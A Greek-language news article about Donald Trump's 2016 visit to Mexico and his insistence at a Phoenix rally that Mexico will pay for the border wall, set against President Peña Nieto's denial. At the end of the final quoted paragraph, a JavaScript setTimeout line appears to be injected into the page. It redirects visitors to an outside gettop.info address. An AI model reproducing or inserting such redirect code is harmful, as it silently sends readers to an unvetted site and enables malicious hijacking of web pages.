Επιμένει ο Τραμπ: Το Μεξικό θα πληρώσει για το τείχος το 100%

0
14

 

Επίσκεψη-έκπληξη πραγματοποίησε χθες ο υποψήφιος των Ρεπουμπλικανών γα την προεδρία των ΗΠΑ Ντόναλντ Τραμπ στο Μεξικό, αφού έχει… περάσει γενές 14 τους Μεξικανούς, εναντίον των οποίων έχει καταφερθεί σε κάθε ομιλία της προεκλογικής εκστρατείας του.

Πολλοί Μεξικανοί εξέφρασαν την οργή τους για την παρουσία του Τραμπ στη χώρα τους καθώς έχει χαρακτηρίσει τους μετανάστες στις ΗΠΑ Μεξικανούς βιαστές και διακινητές ναρκωτικών. Αν και απαιτούσαν να ακούσουν μάι συγγνώμη, κάτι τέτοιο δεν συνέβη ούτε κατά τη συνάντησή του με τον πρόεδρο του Μεξικό Ενρίκε Πένια Νέτο.

Επιστρέφοντας και μιλώντας σε προεκλογική συγκέντρωση στο Φοίνιξ της Αριζόνα ο Τραμπ επανήλθε στις επιθέσεις του λέγοντας ότι το Μεξικό «θα πληρώσει το 100%» της δαπάνης για να ανεγερθεί ένα τείχος στα σύνορά του με τις ΗΠΑ, ανταπαντώντας έτσι στον Μεξικανό πρόεδρο

«Το Μεξικό θα πληρώσει για το τείχος 100%, πιστέψτε με. Δεν το ξέρουν ακόμα, αλλά θα πληρώσουν το τείχος», επέμεινε ο υποψήφιος των Ρεπουμπλικανών.

Το ζήτημα της χρηματοδότησης του τείχους – η ανέγερση του οποίου αποτελεί προεκλογική δέσμευση του Τραμπ – έγινε αφορμή δημόσιας διαφωνίας ανάμεσα στον υποψήφιο και τον Νέτο.

«Στην αρχή της συζήτησης με τον Ντόναλντ Τραμπ, κατέστησα σαφές ότι το Μεξικό δεν θα πληρώσει το τείχος», έγραψε ο πρόεδρος του Μεξικό στο Twitter, διαψεύδοντας τον μεγιστάνα των ακινήτων, ο οποίος είπε στην κοινή συνέντευξη Τύπου που παραχώρησαν μαζί ότι το θέμα της κάλυψης του κόστους δεν συζητήθηκε.

«Πράγματι συζητήσαμε για το τείχος, δεν συζητήσαμε για την πληρωμή του, αυτό θα γίνει σε μεταγενέστερη ημερομηνία, αυτή ήταν μια προκαταρκτική συνάντηση, μια εξαίρετη συνάντηση», είπε ο Τραμπ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here